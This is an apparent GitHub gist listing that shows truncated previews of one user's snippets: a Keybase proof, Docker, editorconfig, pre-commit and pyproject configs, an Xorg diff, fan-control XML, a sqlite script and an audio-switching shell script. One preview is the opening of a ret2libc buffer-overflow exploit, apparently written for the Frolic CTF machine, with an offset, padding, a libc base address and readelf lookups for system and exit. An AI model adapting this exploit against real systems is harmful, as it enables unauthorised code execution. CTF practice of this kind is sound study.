I hereby claim:
- I am ibledy on github.
- I am bledy (https://keybase.io/bledy) on keybase.
- I have a public key ASCC5Ew7a5CdCeazmNVuWQU6PLZH0mopPCqLGl1Nm-zYjAo
To claim this, I am signing this object:
# Tags should be as specific as possible | |
FROM ubuntu:jammy-20220815 | |
# Add metadata to the image | |
LABEL maintainer="[email protected]" | |
# Use diff-friendly syntax for multi-line commands | |
# Do not install non-necessary packages | |
# Sort dependencies | |
# Clean non-necessary files after installing dependencies |
root = true | |
[*] | |
end_of_line = lf | |
insert_final_newline = true | |
trim_trailing_whitespace = true | |
charset = utf-8 | |
indent_style = space | |
[*.{json,py,tf}] |
repos: | |
- repo: meta | |
hooks: | |
- id: check-useless-excludes | |
- repo: https://github.com/pre-commit/pre-commit-hooks | |
rev: v4.2.0 | |
hooks: | |
- id: check-added-large-files | |
- id: check-ast |
[build-system] | |
requires = [ | |
"setuptools", | |
"wheel", | |
] | |
build-backend = "setuptools.build_meta" | |
[tool.black] | |
line-length = 120 | |
skip-string-normalization = true |
#!/usr/bin/python | |
from struct import pack | |
offset = 52 | |
junk = "A" * offset | |
base_libc = 0xb7e19000 | |
# www-data@frolic:/tmp$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep -E "\ssystem|\sexit" | |
# 141: 0002e9d0 31 FUNC GLOBAL DEFAULT 13 exit@@GLIBC_2.0 |
diff --git a/10-amdgpu.conf b/10-amdgpu.conf | |
index ef20256..c86f77a 100644 | |
--- a/10-amdgpu.conf | |
+++ b/10-amdgpu.conf | |
@@ -1,5 +1,5 @@ | |
Section "OutputClass" | |
Identifier "AMDgpu" | |
MatchDriver "amdgpu" | |
- Driver "amdgpu" | |
+ Driver "modesetting" |
<?xml version="1.0"?> | |
<FanControlConfigV2 xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> | |
<NotebookModel>HP Pavilion Gaming Laptop 15-ec1xxx</NotebookModel> | |
<Author>bLeDy</Author> | |
<EcPollInterval>1000</EcPollInterval> | |
<ReadWriteWords>false</ReadWriteWords> | |
<CriticalTemperature>68</CriticalTemperature> | |
<FanConfigurations> | |
<FanConfiguration> | |
<ReadRegister>88</ReadRegister> |
import sqlite3 | |
PLAYERS = [ | |
(1, 'Player1'), | |
(2, 'Player2'), | |
(3, 'Player3'), | |
] | |
COUNTRIES = [ | |
(1, 'Country1'), | |
(2, 'Country2'), |
I hereby claim:
To claim this, I am signing this object:
#!/usr/bin/env bash | |
pactl set-card-profile "alsa_card.usb-Corsa_ir_Components_Inc._Corsair_HS60_Surround_Adapter_v0.1-00" "output:analog-stereo" | |
sleep 1 | |
pactl set-card-profile "alsa_card.usb-Corsa_ir_Components_Inc._Corsair_HS60_Surround_Adapter_v0.1-00" "output:iec958-stereo" |